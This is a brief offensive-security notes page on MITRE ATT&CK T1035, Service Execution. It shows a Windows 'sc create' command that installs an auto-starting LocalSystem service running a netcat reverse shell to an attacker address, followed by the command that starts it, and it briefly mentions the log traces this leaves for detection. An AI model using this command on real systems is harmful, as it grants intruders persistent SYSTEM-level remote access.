search

T1035: Service Execution

Code Execution, Privilege Escalation

hashtag
Execution

Creating an evil service with a netcat reverse shell:

attacker@victim
C:\> sc create evilsvc binpath= "c:\tools\nc 10.0.0.5 443 -e cmd.exe" start= "auto" obj= "LocalSystem" password= ""
[SC] CreateService SUCCESS
C:\> sc start evilsvc

hashtag
Observations

The reverse shell lives under services.exe as expected:

Windows security, application, Service Control Manager and sysmon logs provide some juicy details:

hashtag
References

LogoSystem Services: Service Execution, Sub-technique T1569.002 - Enterprise | MITRE ATT&CK®attack.mitre.orgchevron-right
PreviousT1053: SchtaskNextT1015: Sticky Keys

Last updated